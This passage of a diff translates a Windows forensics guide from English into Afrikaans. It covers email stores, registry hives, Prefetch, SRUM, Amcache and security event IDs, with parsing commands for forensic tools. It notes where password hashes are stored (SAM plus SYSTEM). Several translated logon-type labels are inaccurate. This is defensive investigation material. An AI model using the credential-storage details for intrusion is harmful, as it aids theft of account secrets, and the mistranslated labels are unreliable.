dele: Die koppe en die inhoud** van die e-pos. In die **koppe** kan jy inligting soos vind: -* **Who** sent the emails (email address, IP, mail servers that have redirected the email) -* **When** was the email sent +* **Wie** het die e-posse gestuur (e-posadres, IP, posbedieners wat die e-pos omgelei het) +* **Wanneer** is die e-posse gestuur -Also, inside the `References` and `In-Reply-To` headers you can find the ID of the messages: +Binne die `References` en `In-Reply-To` koppe kan jy ook die ID van die boodskappe vind: ![](<../../../.gitbook/assets/image (484).png>) -### Windows Mail App +### Windows-pos-app -This application saves emails in HTML or text. You can find the emails inside subfolders inside `\Users\\AppData\Local\Comms\Unistore\data\3\`. The emails are saved with the `.dat` extension. +Hierdie toepassing stoor e-posse in HTML- of teksformaat. Jy kan die e-posse binne subgidsies binne `\Users\\AppData\Local\Comms\Unistore\data\3\` vind. Die e-posse word met die `.dat`-uitbreiding gestoor. -The **metadata** of the emails and the **contacts** can be found inside the **EDB database**: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol` +Die **metadata** van die e-posse en die **kontakte** kan binne die **EDB-databasis** gevind word: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol` -**Change the extension** of the file from `.vol` to `.edb` and you can use the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) to open it. Inside the `Message` table you can see the emails. +**Verander die uitbreiding** van die lêer van `.vol` na `.edb` en jy kan die instrument [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) gebruik om dit oop te maak. Binne die `Message`-tabel kan jy die e-posse sien. ### Microsoft Outlook -When Exchange servers or Outlook clients are used there are going to be some MAPI headers: +Wanneer Exchange-bedieners of Outlook-kliënte gebruik word, sal daar sekere MAPI-koppe wees: -* `Mapi-Client-Submit-Time`: Time of the system when the email was sent -* `Mapi-Conversation-Index`: Number of children messages of the thread and timestamp of each message of the thread -* `Mapi-Entry-ID`: Message identifier. -* `Mappi-Message-Flags` and `Pr_last_Verb-Executed`: Information about the MAPI client (message read? no read? responded? redirected? out of the office?) +* `Mapi-Client-Submit-Time`: Tyd van die stelsel toe die e-pos gestuur is +* `Mapi-Conversation-Index`: Aantal kinderboodskappe van die draad en tydstempel van elke boodskap van die draad +* `Mapi-Entry-ID`: Boodskapidentifiseerder. +* `Mappi-Message-Flags` en `Pr_last_Verb-Executed`: Inligting oor die MAPI-kliënt (boodskap gelees? nie gelees nie? geantwoord? omgelei? uit die kantoor?) -In the Microsoft Outlook client, all the sent/received messages, contacts data, and calendar data are stored in a PST file in: +In die Microsoft Outlook-kliënt word al die gestuur/ontvang boodskappe, kontakte-inligting en kalenderinligting gestoor in 'n PST-lêer in: * `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook` (WinXP) * `%USERPROFILE%\AppData\Local\Microsoft\Outlook` -The registry path `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` indicates the file that is being used. +Die registerpad `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` dui die lêer aan wat gebruik word. -You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html). +Jy kan die PST-lêer oopmaak met die instrument [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html). ![](<../../../.gitbook/assets/image (485).png>) +### Microsoft Outlook OST-lêers -### Microsoft Outlook OST Files +'n **OST-lêer** word gegenereer deur Microsoft Outlook wanneer dit gekonfigureer is met 'n **IMAP** of 'n **Exchange**-bediener, wat soortgelyke inligting as 'n PST-lêer stoor. Hierdie lêer word gesinkroniseer met die bediener en behou data vir **die laaste 12 maande** tot 'n **maksimum grootte van 50GB**, en dit is geleë in dieselfde gids as die PST-lêer. Om 'n OST-lêer te sien, kan die [**Kernel OST-kieker**](https://www.nucleustechnologies.com/ost-viewer.html) gebruik word. -An **OST file** is generated by Microsoft Outlook when it's configured with **IMAP** or an **Exchange** server, storing similar information to a PST file. This file is synchronized with the server, retaining data for **the last 12 months** up to a **maximum size of 50GB**, and is located in the same directory as the PST file. To view an OST file, the [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) can be utilized. +### Terugwinning van Aanhegsels -### Retrieving Attachments +Verlore aanhegsels kan herwin word vanaf: -Lost attachments might be recoverable from: +- Vir **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` +- Vir **IE11 en hoër**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` -- For **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` -- For **IE11 and above**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` +### Thunderbird MBOX-lêers -### Thunderbird MBOX Files +**Thunderbird** maak gebruik van **MBOX-lêers** om data te stoor, geleë by `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`. -**Thunderbird** utilizes **MBOX files** to store data, located at `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`. +### Beeld Duimnaels -### Image Thumbnails +- **Windows XP en 8-8.1**: Toegang tot 'n gids met duimnaels skep 'n `thumbs.db`-lêer wat beeldvoorbeelde stoor, selfs na uitvee. +- **Windows 7/10**: `thumbs.db` word geskep wanneer dit oor 'n netwerk via 'n UNC-paad benader word. +- **Windows Vista en nuwer**: Duimnaelvoorbeelde word gekentraliseer in `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` met lêers genaamd **thumbcache\_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) en [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) is hulpmiddels vir die sien van hierdie lêers. -- **Windows XP and 8-8.1**: Accessing a folder with thumbnails generates a `thumbs.db` file storing image previews, even after deletion. -- **Windows 7/10**: `thumbs.db` is created when accessed over a network via UNC path. -- **Windows Vista and newer**: Thumbnail previews are centralized in `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` with files named **thumbcache\_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) and [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) are tools for viewing these files. +### Windows Registerinligting -### Windows Registry Information +Die Windows-register, wat omvattende stelsel- en gebruikersaktiwiteitsdata stoor, word bevat binne lêers in: -The Windows Registry, storing extensive system and user activity data, is contained within files in: +- `%windir%\System32\Config` vir verskeie `HKEY_LOCAL_MACHINE` subleutels. +- `%UserProfile%{User}\NTUSER.DAT` vir `HKEY_CURRENT_USER`. +- Windows Vista en nuwer weergawe maak rugsteun van `HKEY_LOCAL_MACHINE` registerlêers in `%Windir%\System32\Config\RegBack\`. +- Daarbenewens word programuitvoeringsinligting gestoor in `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` vanaf Windows Vista en Windows 2008 Server voortgaan. -- `%windir%\System32\Config` for various `HKEY_LOCAL_MACHINE` subkeys. -- `%UserProfile%{User}\NTUSER.DAT` for `HKEY_CURRENT_USER`. -- Windows Vista and later versions back up `HKEY_LOCAL_MACHINE` registry files in `%Windir%\System32\Config\RegBack\`. -- Additionally, program execution information is stored in `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` from Windows Vista and Windows 2008 Server onwards. +### Hulpmiddels -### Tools +Sommige hulpmiddels is nuttig vir die analise van die registerlêers: -Some tools are useful to analyze the registry files: +* **Registerredakteur**: Dit is geïnstalleer in Windows. Dit is 'n GUI om deur die Windows-register van die huidige sessie te blaai. +* [**Registerverkenner**](https://ericzimmerman.github.io/#!index.md): Dit stel jou in staat om die registerlêer te laai en daardeur te blaai met 'n GUI. Dit bevat ook Bladmerke wat sleutels met interessante inligting uitlig. +* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Weereens, dit het 'n GUI wat toelaat om deur die gelaai register te blaai en bevat ook plugins wat interessante inligting binne die gelaai register uitlig. +* [**Windows Registerherwinning**](https://www.mitec.cz/wrr.html): 'n Ander GUI-toepassing wat in staat is om die belangrike inligting uit die gelaai register te onttrek. -* **Registry Editor**: It's installed in Windows. It's a GUI to navigate through the Windows registry of the current session. -* [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): It allows you to load the registry file and navigate through them with a GUI. It also contains Bookmarks highlighting keys with interesting information. -* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Again, it has a GUI that allows to navigate through the loaded registry and also contains plugins that highlight interesting information inside the loaded registry. -* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Another GUI application capable of extracting the important information from the registry loaded. +### Herstel van Verwyderde Element -### Recovering Deleted Element +Wanneer 'n sleutel verwyder word, word dit as sodanig gemerk, maar dit sal nie verwyder word totdat die spasie wat dit beset word benodig nie. Daarom is dit moontlik om hierdie verwyderde sleutels te herstel deur gebruik te maak van hulpmiddels soos **Registerverkenner**. -When a key is deleted it's marked as such, but until the space it's occupying is needed it won't be removed. Therefore, using tools like **Registry Explorer** it's possible to recover these deleted keys. +### Laaste Skryftyd -### Last Write Time - -Each Key-Value contains a **timestamp** indicating the last time it was modified. +Elke Sleutel-Waarde bevat 'n **tydstempel** wat aandui wanneer dit laas gewysig is. ### SAM -The file/hive **SAM** contains the **users, groups and users passwords** hashes of the system. +Die lêer/hive **SAM** bevat die **gebruikers, groepe en gebruikerswagwoorde**-hasings van die stelsel. -In `SAM\Domains\Account\Users` you can obtain the username, the RID, last login, last failed logon, login counter, password policy and when the account was created. To get the **hashes** you also **need** the file/hive **SYSTEM**. +In `SAM\Domains\Account\Users` kan jy die gebruikersnaam, die RID, laaste aanmelding, laaste mislukte aanmelding, aanmeldingteller, wagwoordbeleid en wanneer die rekening geskep is, verkry. Om die **hasings** te kry, het jy ook die lêer/hive **SYSTEM** **nodig**. -### Interesting entries in the Windows Registry +### Interessante inskrywings in die Windows-register {% content-ref url="interesting-windows-registry-keys.md" %} [interesting-windows-registry-keys.md](interesting-windows-registry-keys.md) {% endcontent-ref %} -## Programs Executed +## Uitgevoerde Programme -### Basic Windows Processes +### Basiese Windows-prosesse -In [this post](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) you can learn about the common Windows processes to detect suspicious behaviours. +In [hierdie berig](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) kan jy leer oor die algemene Windows-prosesse om verdagte gedrag te identifiseer. -### Windows Recent APPs +### Windows Onlangse Programme -Inside the registry `NTUSER.DAT` in the path `Software\Microsoft\Current Version\Search\RecentApps` you can subkeys with information about the **application executed**, **last time** it was executed, and **number of times** it was launched. +Binne die register `NTUSER.DAT` in die pad `Software\Microsoft\Current Version\Search\RecentApps` kan jy subleutels kry met inligting oor die **uitgevoerde toepassing**, **laaste keer** wat dit uitgevoer is, en **aantal kere** wat dit geloods is. ### BAM (Background Activity Moderator) -You can open the `SYSTEM` file with a registry editor and inside the path `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` you can find the information about the **applications executed by each user** (note the `{SID}` in the path) and at **what time** they were executed (the time is inside the Data value of the registry). +Jy kan die `SYSTEM`-lêer oopmaak met 'n registerredakteur en binne die pad `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` kan jy die inligting oor die **toepassings wat deur elke gebruiker uitgevoer is** vind (merk die `{SID}` in die pad) en **watter tyd** hulle uitgevoer is (die tyd is binne die Data-waarde van die register). ### Windows Prefetch -Prefetching is a technique that allows a computer to silently **fetch the necessary resources needed to display content** that a user **might access in the near future** so resources can be accessed quicker. +Prefetching is 'n tegniek wat 'n rekenaar in staat stel om stilweg die nodige hulpbronne op te haal wat nodig is om inhoud te vertoon wat 'n gebruiker **moontlik binnekort sal toegang** sodat hulpbronne vinniger toeganklik kan wees. -Windows prefetch consists of creating **caches of the executed programs** to be able to load them faster. These caches as created as `.pf` files inside the path: `C:\Windows\Prefetch`. There is a limit of 128 files in XP/VISTA/WIN7 and 1024 files in Win8/Win10. +Windows prefetch bestaan uit die skep van **kasgeheues van die uitgevoerde programme** om hulle vinniger te kan laai. Hierdie kasgeheues word geskep as `.pf`-lêers binne die pad: `C:\Windows\Prefetch`. Daar is 'n limiet van 128 lêers in XP/VISTA/WIN7 en 1024 lêers in Win8/Win10. -The file name is created as `{program_name}-{hash}.pf` (the hash is based on the path and arguments of the executable). In W10 these files are compressed. Do note that the sole presence of the file indicates that **the program was executed** at some point. +Die lêernaam word geskep as `{program_naam}-{hash}.pf` (die hash is gebaseer op die pad en argumente van die uitvoerbare lêer). In W10 is hierdie lêers saamgedruk. Let daarop dat die blootwesigheid van die lêer aandui dat **die program op 'n stadium uitgevoer is**. -The file `C:\Windows\Prefetch\Layout.ini` contains the **names of the folders of the files that are prefetched**. This file contains **information about the number of the executions**, **dates** of the execution and **files** **open** by the program. - -To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd): +Die lêer `C:\Windows\Prefetch\Layout.ini` bevat die **name van die gids van die lêers wat geprefetch word**. Hierdie lêer bevat **inligting oor die aantal uitvoerings**, **datums** van die uitvoering en **lêers** **wat oop** is deur die program. +Om hierdie lêers te ondersoek, kan jy die hulpmiddel [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd) gebruik: ```bash .\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder" ``` - ![](<../../../.gitbook/assets/image (487).png>) ### Superprefetch -**Superprefetch** has the same goal as prefetch, **load programs faster** by predicting what is going to be loaded next. However, it doesn't substitute the prefetch service.\ -This service will generate database files in `C:\Windows\Prefetch\Ag*.db`. +**Superprefetch** het dieselfde doel as prefetch, **laai programme vinniger** deur te voorspel wat die volgende gelaaide item sal wees. Dit vervang egter nie die prefetch-diens nie.\ +Hierdie diens sal databasislêers genereer in `C:\Windows\Prefetch\Ag*.db`. -In these databases you can find the **name** of the **program**, **number** of **executions**, **files** **opened**, **volume** **accessed**, **complete** **path**, **timeframes** and **timestamps**. +In hierdie databasisse kan jy die **naam** van die **program**, **aantal** **uitvoerings**, **geopen** **lêers**, **toegang tot** **volume**, **volledige** **pad**, **tydperke** en **tydstempels** vind. -You can access this information using the tool [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/). +Jy kan hierdie inligting kry deur die hulpmiddel [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/) te gebruik. ### SRUM -**System Resource Usage Monitor** (SRUM) **monitors** the **resources** **consumed** **by a process**. It appeared in W8 and it stores the data in an ESE database located in `C:\Windows\System32\sru\SRUDB.dat`. +**System Resource Usage Monitor** (SRUM) **monitor** die **hulpbronne** **verbruik** **deur 'n proses**. Dit het in W8 verskyn en stoor die data in 'n ESE-databasis wat in `C:\Windows\System32\sru\SRUDB.dat` geleë is. -It gives the following information: +Dit gee die volgende inligting: -* AppID and Path -* User that executed the process -* Sent Bytes -* Received Bytes -* Network Interface -* Connection duration -* Process duration +* AppID en Pad +* Gebruiker wat die proses uitgevoer het +* Gestuurde bytes +* Ontvangsbytes +* Netwerkinterface +* Verbindingsduur +* Prosesduur -This information is updated every 60 mins. - -You can obtain the date from this file using the tool [**srum\_dump**](https://github.com/MarkBaggett/srum-dump). +Hierdie inligting word elke 60 minute opgedateer. +Jy kan die datum uit hierdie lêer kry deur die hulpmiddel [**srum\_dump**](https://github.com/MarkBaggett/srum-dump) te gebruik. ```bash .\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum ``` - ### AppCompatCache (ShimCache) -The **AppCompatCache**, also known as **ShimCache**, forms a part of the **Application Compatibility Database** developed by **Microsoft** to tackle application compatibility issues. This system component records various pieces of file metadata, which include: +Die **AppCompatCache**, ook bekend as **ShimCache**, vorm deel van die **Application Compatibility Database** wat deur **Microsoft** ontwikkel is om programverenigbaarheidsprobleme aan te spreek. Hierdie stelselkomponent neem verskeie stukke lêermetadata op, wat insluit: -- Full path of the file -- Size of the file -- Last Modified time under **$Standard\_Information** (SI) -- Last Updated time of the ShimCache -- Process Execution Flag +- Volledige pad van die lêer +- Grootte van die lêer +- Laaste gewysigde tyd onder **$Standard\_Information** (SI) +- Laaste opgedateerde tyd van die ShimCache +- Prosesuitvoeringsvlag -Such data is stored within the registry at specific locations based on the version of the operating system: +Sodanige data word binne die register gestoor op spesifieke plekke gebaseer op die weergawe van die bedryfstelsel: -- For XP, the data is stored under `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` with a capacity for 96 entries. -- For Server 2003, as well as for Windows versions 2008, 2012, 2016, 7, 8, and 10, the storage path is `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, accommodating 512 and 1024 entries, respectively. +- Vir XP word die data gestoor onder `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` met 'n kapasiteit vir 96 inskrywings. +- Vir Server 2003, sowel as vir Windows-weergawes 2008, 2012, 2016, 7, 8 en 10, is die bergpad `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, wat onderskeidelik 512 en 1024 inskrywings akkommodeer. -To parse the stored information, the [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) is recommended for use. +Om die gestoorde inligting te ontleden, word die [**AppCompatCacheParser**-hulpmiddel](https://github.com/EricZimmerman/AppCompatCacheParser) aanbeveel vir gebruik. ![](<../../../.gitbook/assets/image (488).png>) ### Amcache -The **Amcache.hve** file is essentially a registry hive that logs details about applications that have been executed on a system. It is typically found at `C:\Windows\AppCompat\Programas\Amcache.hve`. +Die **Amcache.hve**-lêer is in wese 'n registerhys wat besonderhede oor toepassings wat op 'n stelsel uitgevoer is, registreer. Dit word tipies gevind by `C:\Windows\AppCompat\Programas\Amcache.hve`. -This file is notable for storing records of recently executed processes, including the paths to the executable files and their SHA1 hashes. This information is invaluable for tracking the activity of applications on a system. - -To extract and analyze the data from **Amcache.hve**, the [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) tool can be used. The following command is an example of how to use AmcacheParser to parse the contents of the **Amcache.hve** file and output the results in CSV format: +Hierdie lêer is merkwaardig omdat dit rekords van onlangs uitgevoerde prosesse stoor, insluitend die paaie na die uitvoerbare lêers en hul SHA1-hashes. Hierdie inligting is van onschatbare waarde vir die opspoor van die aktiwiteit van toepassings op 'n stelsel. +Om die data uit **Amcache.hve** te onttrek en te analiseer, kan die [**AmcacheParser**-hulpmiddel](https://github.com/EricZimmerman/AmcacheParser) gebruik word. Die volgende opdrag is 'n voorbeeld van hoe om AmcacheParser te gebruik om die inhoud van die **Amcache.hve**-lêer te ontleden en die resultate in CSV-formaat uit te voer: ```bash AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder ``` +Onder die gegenereerde CSV-lêers is die `Amcache_Unassociated file entries` veral merkwaardig vanweë die ryk inligting wat dit verskaf oor nie-geassosieerde lêerinvoere. -Among the generated CSV files, the `Amcache_Unassociated file entries` is particularly noteworthy due to the rich information it provides about unassociated file entries. - -The most interesting CVS file generated is the `Amcache_Unassociated file entries`. +Die mees interessante CVS-lêer wat gegenereer word, is die `Amcache_Unassociated file entries`. ### RecentFileCache -This artifact can only be found in W7 in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` and it contains information about the recent execution of some binaries. +Hierdie artefak kan slegs in W7 gevind word in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` en dit bevat inligting oor die onlangse uitvoering van sekere bineêre lêers. -You can use the tool [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) to parse the file. +Jy kan die instrument [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) gebruik om die lêer te ontled. -### Scheduled tasks +### Geskeduleerde take -You can extract them from `C:\Windows\Tasks` or `C:\Windows\System32\Tasks` and read them as XML. +Jy kan hulle onttrek uit `C:\Windows\Tasks` of `C:\Windows\System32\Tasks` en as XML lees. -### Services +### Dienste -You can find them in the registry under `SYSTEM\ControlSet001\Services`. You can see what is going to be executed and when. +Jy kan hulle in die register vind onder `SYSTEM\ControlSet001\Services`. Jy kan sien wat uitgevoer gaan word en wanneer. ### **Windows Store** -The installed applications can be found in `\ProgramData\Microsoft\Windows\AppRepository\`\ -This repository has a **log** with **each application installed** in the system inside the database **`StateRepository-Machine.srd`**. +Die geïnstalleerde programme kan gevind word in `\ProgramData\Microsoft\Windows\AppRepository\`\ +Hierdie bewaarplek het 'n **log** met **elke geïnstalleerde toepassing** in die stelsel binne die databasis **`StateRepository-Machine.srd`**. -Inside the Application table of this database, it's possible to find the columns: "Application ID", "PackageNumber", and "Display Name". These columns have information about pre-installed and installed applications and it can be found if some applications were uninstalled because the IDs of installed applications should be sequential. +Binne die Toepassingstabel van hierdie databasis is dit moontlik om die kolomme te vind: "Toepassings-ID", "Pakketnommer" en "Vertoonnaam". Hierdie kolomme bevat inligting oor vooraf geïnstalleerde en geïnstalleerde toepassings en dit kan gevind word of sommige toepassings gedeïnstalleer is omdat die ID's van geïnstalleerde toepassings opeenvolgend moet wees. -It's also possible to **find installed application** inside the registry path: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ -And **uninstalled** **applications** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` +Dit is ook moontlik om **geïnstalleerde toepassing** te vind binne die registerpad: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ +En **gedeïnstalleerde** **toepassings** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` -## Windows Events +## Windows-gebeure -Information that appears inside Windows events are: +Inligting wat binne Windows-gebeure verskyn, is: -* What happened -* Timestamp (UTC + 0) -* Users involved -* Hosts involved (hostname, IP) -* Assets accessed (files, folder, printer, services) +* Wat gebeur het +* Tydstempel (UTC + 0) +* Betrokke gebruikers +* Betrokke gasheer (gasheernaam, IP) +* Betrokke bates (lêers, vouer, drukkers, dienste) -The logs are located in `C:\Windows\System32\config` before Windows Vista and in `C:\Windows\System32\winevt\Logs` after Windows Vista. Before Windows Vista, the event logs were in binary format and after it, they are in **XML format** and use the **.evtx** extension. +Die loglêers is geleë in `C:\Windows\System32\config` voor Windows Vista en in `C:\Windows\System32\winevt\Logs` na Windows Vista. Voor Windows Vista was die gebeurtenisloglêers in binêre formaat en daarna is dit in **XML-formaat** en gebruik die **.evtx**-uitbreiding. -The location of the event files can be found in the SYSTEM registry in **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** +Die ligging van die gebeurtenislêers kan gevind word in die SISTEEM-register in **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** -They can be visualized from the Windows Event Viewer (**`eventvwr.msc`**) or with other tools like [**Event Log Explorer**](https://eventlogxp.com) **or** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.** +Dit kan gesien word vanuit die Windows-gebeurtenisleser (**`eventvwr.msc`**) of met ander instrumente soos [**Event Log Explorer**](https://eventlogxp.com) **of** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.** -## Understanding Windows Security Event Logging +## Begrip van Windows-sekuriteitsgebeure -Access events are recorded in the security configuration file located at `C:\Windows\System32\winevt\Security.evtx`. This file's size is adjustable, and when its capacity is reached, older events are overwritten. Recorded events include user logins and logoffs, user actions, and changes to security settings, as well as file, folder, and shared asset access. +Toegangsgebeure word aangeteken in die sekuriteitskonfigurasie-lêer wat geleë is by `C:\Windows\System32\winevt\Security.evtx`. Hierdie lêer se grootte is aanpasbaar, en wanneer sy kapasiteit bereik is, word ouer gebeure oorskryf. Aangetekende gebeure sluit gebruikersaanmeldings en -afmeldings, gebruikersaksies en veranderinge aan sekuriteitsinstellings in, sowel as toegang tot lêers, vouers en gedeelde bates. -### Key Event IDs for User Authentication: +### Sleutel-gebeurtenis-ID's vir gebruikersverifikasie: -- **EventID 4624**: Indicates a user successfully authenticated. -- **EventID 4625**: Signals an authentication failure. -- **EventIDs 4634/4647**: Represent user logoff events. -- **EventID 4672**: Denotes login with administrative privileges. +- **Gebeurtenis-ID 4624**: Dui aan dat 'n gebruiker suksesvol geverifieer is. +- **Gebeurtenis-ID 4625**: Dui op 'n mislukte verifikasie. +- **Gebeurtenis-ID's 4634/4647**: Verteenwoordig gebruikersafmeldingsgebeure. +- **Gebeurtenis-ID 4672**: Dui op aanmelding met administratiewe voorregte. -#### Sub-types within EventID 4634/4647: +#### Subtipes binne Gebeurtenis-ID 4634/4647: -- **Interactive (2)**: Direct user login. -- **Network (3)**: Access to shared folders. -- **Batch (4)**: Execution of batch processes. -- **Service (5)**: Service launches. -- **Proxy (6)**: Proxy authentication. -- **Unlock (7)**: Screen unlocked with a password. -- **Network Cleartext (8)**: Clear text password transmission, often from IIS. -- **New Credentials (9)**: Usage of different credentials for access. -- **Remote Interactive (10)**: Remote desktop or terminal services login. -- **Cache Interactive (11)**: Login with cached credentials without domain controller contact. -- **Cache Remote Interactive (12)**: Remote login with cached credentials. -- **Cached Unlock (13)**: Unlocking with cached credentials. +- **Interaktief (2)**: Direkte gebruikersaanmelding. +- **Netwerk (3)**: Toegang tot gedeelde vouers. +- **Batch (4)**: Uitvoering van lotprosesse. +- **Diens (5)**: Dienslansering. +- **Proxy (6)**: Proxy-verifikasie. +- **Ontsluit (7)**: Skerm ontgrendel met 'n wagwoord. +- **Netwerkduidelike teks (8)**: Duidelike teks wagwoordoordrag, dikwels vanaf IIS. +- **Nuwe legitimasie (9)**: Gebruik van verskillende legitimasie vir toegang. +- **Verwyderde interaktief (10)**: Verwyderde skerm of terminaaldiensaanmelding. +- **Verwyderde interaktiewe opgesluit (11)**: Aanmelding met opgeslote legitimasie sonder kontak met 'n domeinbeheerder. +- **Verwyderde ontgrendeling (12)**: Verwyderde aanmelding met opgeslote legitimasie. +- **Opgeslote ontgrendeling (13)**: Ontsluiting met opgeslote legitimasie. -#### Status and Sub Status Codes for EventID 4625: +#### Status- en Substatuskodes vir Gebeurtenis-ID 4625: -- **0xC0000064**: User name does not exist - Could indicate a username enumeration attack. -- **0xC000006A**: Correct user name but wrong password - Possible password guessing or brute-force attempt. -- **0xC0000234**: User account locked out - May follow a brute-force attack resulting in multiple failed logins. -- **0xC0000072**: Account disabled - Unauthorized attempts to access disabled accounts. -- **0xC000006F**: Logon outside allowed time - Indicates attempts to access outside of set login hours, a possible sign of unauthorized access. -- **0xC0000070**: Violation of workstation restrictions - Could be an attempt to login from an unauthorized location. -- **0xC0000193**: Account expiration - Access attempts with expired user accounts. -- **0xC0000071**: Expired password - Login attempts with outdated passwords. -- **0xC0000133**: Time sync issues - Large time discrepancies between client and server may be indicative of more sophisticated attacks like pass-the-ticket. -- **0xC0000224**: Mandatory password change required - Frequent mandatory changes might suggest an attempt to destabilize account security. -- **0xC0000225**: Indicates a system bug rather than a security issue. -- **0xC000015b**: Denied logon type - Access attempt with unauthorized logon type, such as a user trying to execute a service logon. +- **0xC0000064**: Gebruikersnaam bestaan nie - Kan dui op 'n aanval van gebruikersnaamopname. +- **0xC000006A**: Korrekte gebruikersnaam, maar verkeerde wagwoord - Moontlike wagwoord raai of brute force-poging. +- **0xC0000234**: Gebruikersrekening gesluit - Kan volg op 'n brute force-aanval met verskeie mislukte aanmeldings. +- **0xC0000072**: Rekening gedeaktiveer - Onbevoegde pogings om gedeaktiveerde rekeninge te benader. +- **0xC000006F**: Aanmelding buite toegelate tyd - Dui op pogings om buite die vasgestelde aanmeldingstye toegang te verkry, 'n moontlike teken van onbevoegde toegang. +- **0xC0000070**: Oortreding van werksplekbeperkings - Kan 'n poging wees om vanaf 'n onbevoegde plek aan te meld. +- **0xC0000193**: Rekening verval - Toegangspogings met vervalde gebruikersrekeninge. +- **0xC0000071**: Vervalde wagwoord - Aanmeldingspogings met verouderde wagwoorde. +- **0xC0000133**: Tydsinkronisasieprobleme - Groot tydverskille tussen kliënt en bediener kan dui op meer gesofistikeerde aanvalle soos pass-the-ticket. +- **0xC0000224**: Verpligte wagwoordverandering vereis - Gereelde verpligte veranderinge kan dui op 'n poging om rekeningsekuriteit te destabiliseer. +- **0xC0000225**: Dui op 'n stelselfout eerder as 'n sekuriteitsprobleem. +- **0xC000015b**: Geweierde aanmeldingstipe - Toegangspoging met onbevoegde aanmeldingstipe, soos 'n gebruiker wat probeer om 'n diensaanmelding uit te voer. -#### EventID 4616: -- **Time Change**: Modification of the system time, could obscure the timeline of events. +#### Gebeurtenis-ID 4616: +- **Tydverandering**: Wysiging van die stelseltyd, kan die tydlyn van gebeure verwar. -#### EventID 6005 and 6006: -- **System Startup and Shutdown**: EventID 6005 indicates the system starting up, while EventID 6006 marks it shutting down. +#### Gebeurtenis-ID's 6005 en 6006: +- **Stelselbegin en -afsluiting**: Gebeurtenis-ID 6005 dui op die begin van die stelsel, terwyl Gebeurtenis-ID 6006 dit aandui wanneer dit afsluit. -#### EventID 1102: -- **Log Deletion**: Security logs being cleared, which is often a red flag for covering up illicit activities. +#### Gebeurtenis-ID 1102: +- **Logwissing**: Sekuriteitslêers wat skoongevee word, wat dikwels 'n rooi vlag is vir die bedek van onwettige aktiwiteite. -#### EventIDs for USB Device Tracking: -- **20001 / 20003 / 10000**: USB device first connection. -- **10100**: USB driver update. -- **EventID 112**: Time of USB device insertion. +#### Gebeurtenis-ID's vir USB-toestelopsporing: +- **20001 / 20003 / 10000**: Eerste koppeling van USB-toestel. +- **10100**: USB-bestuursprogramopdatering. +- **Gebeurtenis-ID 112**: Tyd van USB-toestelinvoeging. -For practical examples on simulating these login types and credential dumping opportunities, refer to [Altered Security's detailed 